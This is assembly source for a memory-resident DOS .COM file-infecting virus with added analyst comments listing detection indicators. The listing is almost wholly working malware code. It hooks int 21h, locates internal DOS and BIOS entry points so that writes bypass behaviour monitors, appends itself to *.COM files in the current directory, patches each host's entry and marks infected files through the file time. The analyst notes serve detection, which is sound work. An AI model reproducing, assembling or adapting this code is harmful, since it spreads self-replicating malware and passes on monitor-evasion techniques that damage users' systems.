;*****************************************************************************
; VIRUS DEMO (not destructive)
;-----------------------------------------------------------------------------
; Analyst notes (review): 16-bit DOS .COM appender that goes resident via
; the int 21h vector. As assembled, the int 21h handler starts at 100h
; (len bytes) and is followed by the DTA buffer, the file name pattern, the
; "data" prefix and the installer that runs when an infected host starts.
; On-disk artifacts established by this listing (useful for file scanning):
;   - host grows by plen+len bytes: the prefix "data" then the body are
;     appended at the original end of file
;   - the host's first 3 bytes are replaced by a near CALL (E8) to the
;     original end of file; the saved bytes live in dat1..dat3 inside the
;     appended prefix, which writes them back to 100h..102h at start-up
;   - the seconds field of the file time (low 5 bits of DTA+16h) is forced
;     to 31 (= 62 s) and is also the "already infected" marker
;   - only *.COM in the current directory are considered; the read-only
;     attribute is cleared for the write and restored, date/time restored
; In-memory artifacts: the int 6Bh (0:1ACh) and int 6Ch (0:1B0h) vectors
; hold the located DOS int 21h / BIOS int 13h entries; a non-zero int 6Bh
; offset is the residency check; int 21h points at <resident seg>:102h.
; The resident copy is placed below the top of conventional memory taken
; from [0:413h] without lowering that value, so nothing in this listing
; protects it from later allocations (observation, not verified).
; File writes go to the located DOS entry through int 6Bh rather than the
; current int 21h vector, so an int 21h behaviour monitor installed before
; this code would not observe them; the on-disk checks above are the
; reliable indicators.
;-----------------------------------------------------------------------------
len equ 037eh ; byte count of the virus body copied/written from cs:0100h
plen equ 014eh ; byte count of the "data" prefix appended before the body
cplace equ 9800h ; not referenced below; the resident segment is computed at run time
;-----------------------------------------------------------------------------
; FIND FIRST FILE
;-----------------------------------------------------------------------------
jmp con
;-----------------------------------------------------------------------------
; RESIDENT INT 21h HANDLER ENTRY. The vector is set to offset 102h at label
; "hooked" below, i.e. just past the jmp above (this assumes the jmp
; assembles to 2 bytes - not verified here). Requests whose function number
; is not in this list are passed straight to the original DOS entry.
;-----------------------------------------------------------------------------
; check if a virusing operation required.
cmp ah,3dh ;open file
je con
cmp ah,0fh ;open file
je con
cmp ah,4bh ;exec!!!
je con
cmp ah,0eh ;select disk
je con
cmp ah,5bh ;create file
je con
cmp ah,16h ;create file
je con
cmp ah,3ch ;create file
je con
cmp ah,41h ;delete file
je con
cmp ah,13h ;delete file
je con
cmp ah,56h ;rename file
je con
cmp ah,17h ;rename file
je con
; end of check
int 6bh ; chain to the DOS entry stored in the int 6Bh vector
iret
con: push ax
push bx
push cx
push es
push ds
push dx
;----------------------------------------------------------------------------
; cancel this line: put int 6b to int 21 & int 21 to 6b
; put int 6c to int 13 & int 13 to 6c
;----------------------------------------------------------------------------
; swap int 13 with int 6c
; While infecting, int 13h is pointed at the BIOS entry stored in the int 6Ch
; vector by the installer, so disk writes bypass whatever currently owns
; int 13h. The two vectors are swapped back at label "error" below.
mov ax,0
mov ds,ax
push word ptr [01b0h] ; int 6c
push word ptr [01b2h]
push word ptr [004ch] ; int 13
push word ptr [004eh]
pop word ptr [01b2h] ; put int 13 to 6c
pop word ptr [01b0h]
pop word ptr [004eh] ; put int 6c to int 13
pop word ptr [004ch]
;-----------------------------------------------------------------------------
; find first file
;-----------------------------------------------------------------------------
; DTA is set to "buff" (43 bytes); fields used below: +15h attribute,
; +16h time, +18h date, +1Ah size, +1Eh (buff+30) file name.
mov ah,1ah
mov dx,cs
mov ds,dx
mov dx,offset buff
int 6bh
mov ah,4eh
mov cx,0 ; attribute mask 0: normal files only
mov dx,cs
mov ds,dx
mov dx,offset fname
int 6bh
jc error1 ; no *.COM in the current directory
;----------------------------------------------------------------------------
; CHECK THE TIME OF FILE TO SEE IF IT IS 31*2 SEC
;----------------------------------------------------------------------------
; A seconds/2 field of 31 marks a file as already infected; such files are
; skipped, so each file is infected at most once.
lfnd: mov ax,word ptr buff+16h
and ax,31
cmp ax,31
jne maketim ;if time not 31 make time 31 and continue
; find next .com file
mov ah,4fh
int 6bh
jc error1 ; no more candidates
jmp lfnd
;
maketim: mov ax,word ptr buff+16h
and ax,65504 ;zero the 5 low bits (seconds/2 field)
add ax,31
mov word ptr buff+16h,ax ; put the fixed date
; ----------------------------------------------------------------------
; change the file attributes to 0 (against read only flag)
;----------------------------------------------------------------------
; The original attribute byte stays in buff+15h and is restored at the end.
mov ax,cs
mov ds,ax
mov ax,4301h
mov cx,0
mov dx,offset buff
add dx,30
int 6bh
; changed attributes to 0
; find file size
;mov ax,word ptr buff+1ah
; open the file
mov ah,3dh
mov al,2 ; read/write access
mov dx,cs
mov ds,dx
mov dx,offset buff
add dx,30
int 6bh
jc error1
mov fhandle,ax
;------------------------------------
; close
;-----------------------------------
jmp cont
;-----------------------------------------------------------------------------
; NOT FAR ERROR (here mcafee searches for the string)
;-----------------------------------------------------------------------------
; Trampoline so the short conditional jumps above can reach "error".
error1: jmp error
;-----------------------------------------------------------------------------
; PUT THE CALL INSTRUCTION CODE IN BUFF
;-----------------------------------------------------------------------------
; Builds E8 <size-3> in buff+0..2: a near CALL whose target is the original
; end of the host (where the prefix is appended). The CALL's pushed return
; address is replaced by 100h in the installer below.
cont: mov ax,word ptr buff+1ah ; ax=the file size
sub ax,3 ;find the disp for the jump code
mov buff+1,al
mov buff+2,ah
mov ax,00e8h
mov buff,al
;-----------------------------------------------------------------------------
; READ THE 3 FIRST BYTES FROM THE FILE
;-----------------------------------------------------------------------------
mov ah,42h
mov al,0 ; seek from start of file
mov bx,fhandle
mov cx,0
mov dx,0
int 6bh
jc error1
mov ah,3fh
mov dx,cs
mov ds,dx
mov dx,offset buff
add dx,3
mov bx,fhandle
mov cx,3
int 6bh
jc error1
cmp ax,cx ; short read (file under 3 bytes) is treated as an error
jl error1
;-----------------------------------------------------------------------------
; MOVE 3 BYTES FROM BUFF+3 TO dat1-3
;-----------------------------------------------------------------------------
; dat1..dat3 are the immediates of the three "mov byte ptr" instructions in
; the prefix, so the prefix carries the host's original bytes with it.
mov al,buff+3
mov dat1,al
mov al,buff+4
mov dat2,al
mov al,buff+5
mov dat3,al
;-----------------------------------------------------------------------------
; WRITE THE JMP INSTRUCTION TO THE DISK
;-----------------------------------------------------------------------------
mov ah,42h
mov al,0
mov bx,fhandle
mov cx,0
mov dx,0
int 6bh
jc error1
mov ah,40h
mov dx,cs
mov ds,dx
mov dx,offset buff
mov bx,fhandle
mov cx,3
int 6bh
jc error1
cmp ax,3
jne error
;-----------------------------------------------------------------------------
; CALCULATE THE START ADDRESS OF THE VIRUS DATA ITSELF
;-----------------------------------------------------------------------------
; sdat1 is the imm16 of "mov si,..." at label "source": the offset, in the
; infected host's image, where the body begins (100h + size + plen).
mov ax,word ptr buff+1ah
add ax,100h
add ax,plen
mov sdat1,al
mov sdat1+1,ah
;-----------------------------------------------------------------------------
; WRITE THE VIRUS PREFIX TO DISK
;-----------------------------------------------------------------------------
mov ah,42h
mov al,2 ; seek to end of file
mov bx,fhandle
mov cx,0
mov dx,0
int 6bh
jc error
mov ah,40h
mov dx,cs
mov ds,dx
mov dx,offset data
mov bx,fhandle
mov cx,plen
int 6bh
jc error
cmp ax,plen
jne error
;----------------------------------------------------------------------------
; WRITE THE BODY: len bytes from cs:0100h, i.e. this resident copy itself
;----------------------------------------------------------------------------
mov ah,40h
mov dx,cs
mov ds,dx
mov dx,0100h
mov bx,fhandle
mov cx,len
int 6bh
jc error
cmp ax,len
jne error
;-----------------------------------------------------------------------------
; set old date again + fixed time
;-----------------------------------------------------------------------------
; cx carries the time word with the seconds field already set to 31.
mov ah,57h
mov al,01h
mov bx,fhandle
mov cx,word ptr buff+16h
mov dx,word ptr buff+18h
int 6bh
;----------------------------------------------------------------------------
; put the old attributes back
;----------------------------------------------------------------------------
mov ax,cs
mov ds,ax
mov ax,4301h
mov cl,byte ptr buff+15h
mov ch,0
mov dx,offset buff
add dx,30
int 6bh
;-----------------------------------------------------------------------------
; CLOSE FILE
;-----------------------------------------------------------------------------
; Shared exit for every path, including the error paths taken before the
; file was opened (fhandle then holds whatever was stored last).
error: mov ah,3eh
mov bx,fhandle
int 6bh
;-----------------------------------------------------------------------------
; swap back int 13 with int 6c
mov ax,0
mov ds,ax
push word ptr [01b0h] ; int 6c
push word ptr [01b2h]
push word ptr [004ch] ; int 13
push word ptr [004eh]
pop word ptr [01b2h] ; put int 13 to 6c
pop word ptr [01b0h]
pop word ptr [004eh] ; put int 6c to int 13
pop word ptr [004ch]
;-----------------------------------------------------------------------------
pop dx
pop ds
pop es
pop cx
pop bx
pop ax
int 6bh ; now perform the caller's original DOS request
iret
;*****************************************************************************
; DATA SECTION
;-----------------------------------------------------------------------------
buff db 43 dup (0) ; DTA for find-first/next
fname db "*.COM",0
fhandle dw ?
;-----------------------------------------------------------------------------
; PREFIX + INSTALLER (executed in the infected host, reached by the patched
; CALL at the host's offset 100h). The first three entries encode
; "mov byte ptr [0100h..0102h],imm8" (C6 06 disp16 imm8) and restore the
; host's original bytes; dat1..dat3 are filled in by the infector above.
;-----------------------------------------------------------------------------
data db 198,6,0,1
dat1 db 0
datb db 198,6,1,1
dat2 db 0
datc db 198,6,2,1
dat3 db 0
pop bx ;change the call data to 100h
mov bx,100h ; final "ret" below therefore lands on the restored host entry
push bx
; push all registers
push ax
push dx
push ds
;-----------------------------------------------------------------------------
; check if virus is already in MEMORY
; if it is, use the one in memory
;-----------------------------------------------------------------------------
; Residency marker: a non-zero offset in the int 6Bh vector (0:1ACh).
mov ax,0
mov ds,ax
mov ax,[01ach]
cmp ax,0
jne ggo00
; find cplace and push it
; Segment = (KB of conventional memory at 0:413h) * 40h - 867h paragraphs,
; i.e. a fixed distance below the top of memory; [0:413h] is not reduced.
mov ax,0
mov ds,ax
mov ax,[413h]
mov bx,40h
mul bx
sub ax,867h
mov cx,ax
push cx
;
; Copy len bytes from cs:[sdat1] (the body inside this host) to seg:100h.
mov cx,len
source db 190 ;MOV SI,OFFSET SOURCE
sdat1 db 0,0
mov di,100h
push cs
pop ds
pop es ;cplace-> now 9800h
cld
rep movsb
;------------------------------------------------------------------------------
; put int 21 => int 6b & int 13 => int 6c
;------------------------------------------------------------------------------
; Reads the DOS version, then takes the segment word at 0:BAh (DOS 2.x/3.0)
; or 0:B6h (later) as the DOS code segment and scans it for one of two
; instruction byte patterns to locate an internal int 21h entry point. If
; found, that address is stored in the int 6Bh vector; otherwise the current
; int 21h vector is copied there ("hook to int 21" below).
mov ax,3000h
int 21h ; make sure int 21 is not yet hooked !!!!!!
d20: mov si,00bah
cmp al,2h
je didit
cmp ax,0003h
jbe didit
d30: mov si,00b6h
didit: mov ax,0
mov ds,ax
mov ax,[si]
mov ds,ax
mov si,0000h
fnd: mov al,2eh
mov ah,80h
cmp al,[si]
jne do33
mov al,3ah
cmp al,[si+1]
jne do33
mov al,26h
cmp al,[si+2]
jne do33
mov al,0dh
cmp al,[si+4]
je found
jmp do33
;-----------------------------------------
; bridge for far jump
ggo00: jmp ggo
;----------------------------------------
do33: cmp ah,[si]
jne nohing
mov ah,0fch
cmp ah,[si+1]
jne nohing
mov ah,4bh
cmp ah,[si+2]
jne nohing
mov ah,5h
cmp ah,[si+4]
je found
nohing: inc si
cmp si,0fffch ; whole segment scanned without a match
jne fnd
; hook to int 21 (there is no another choice)
mov dx,0
mov ds,dx
push word ptr [84h]
pop word ptr [1ach] ; put int 21 to int 6b
push word ptr [86h]
pop word ptr [1aeh] ; put int 21 to int 6b
jmp ft13
; end of hook
found: push ds
mov ax,0
mov ds,ax
pop [01aeh] ; data seg of int 6b
push si
pop [01ach] ; offset of int 6b
;-----------------------------------------------------------------------------
;----------------------------------------------------------------------------
; find int 13h
;
; Same idea for the BIOS disk entry: the live int 13h vector (0:4Ch) is first
; overwritten with the hard-coded address C800h:215Dh (its meaning is not
; established by this listing), then, unless DOS major version is 2, the
; segment word at 0:3Eh is scanned for a byte pattern. The result (or the
; current vector if nothing matches) is stored in the int 6Ch vector.
ft13: mov si,0
mov ds,si
mov ax,3000h
int 21h
mov cx,0c800h
mov bx,215dh
mov [004ch],bx
mov [004eh],cx
cmp al,2
je hooked
mov ax,[003eh]
mov ds,ax
mov ax,0a32eh
mov bx,809ch
mov cl,2eh
fnd13: cmp [si],al
jne loko
cmp ah,[si+1]
jne loko
cmp bl,[si+4]
jne loko
cmp bh,[si+5]
je put13
cmp cl,[si+5]
je put13
loko: inc si
cmp si,0fffch
jne fnd13
;put int 13 to int 6c
mov dx,0
mov ds,dx
push word ptr [004ch]
pop word ptr [01b0h]
push word ptr [004eh]
pop word ptr [01b2h]
jmp hooked
;end of hook
put13: push ds
mov ax,0
mov ds,ax
pop [01b2h]
mov [01b0h],si
;------------------------------------------------------------------------
; HOOK THE VIRUS TO INT 21
;------------------------------------------------------------------------
; hook the virus
; ds is still 0 here; es holds the resident segment popped earlier.
hooked: mov ax,102h
mov [84h],ax
mov [86h],es ;put cplace
;-----------------------------------------------------------------------
; Issue one int 21h request whose function number (0Fh) is in the handler's
; list, which makes the now-resident copy run an infection pass at once.
;-----------------------------------------------------------------------
ggo: mov ah,0fh
int 21h
; pop all registers
pop ds
pop dx
pop ax
ret ; returns to 100h (pushed above): the restored host entry